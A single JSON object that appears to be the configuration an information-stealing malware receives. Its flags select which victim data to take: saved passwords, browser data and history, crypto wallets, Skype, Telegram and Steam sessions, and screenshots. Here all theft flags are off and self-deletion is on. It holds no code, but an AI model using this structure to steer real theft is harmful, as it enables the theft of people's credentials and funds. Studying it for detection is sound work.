{"isDouble":true,"isSavedPasswords":false,"isBrowserData":false,"isBrowserHistory":false,"isWallets":false,"isSkype":false,"isTelegram":false,"isSteam":false,"isScreenshot":false,"isDelete":true,"files":{},"loader":{}}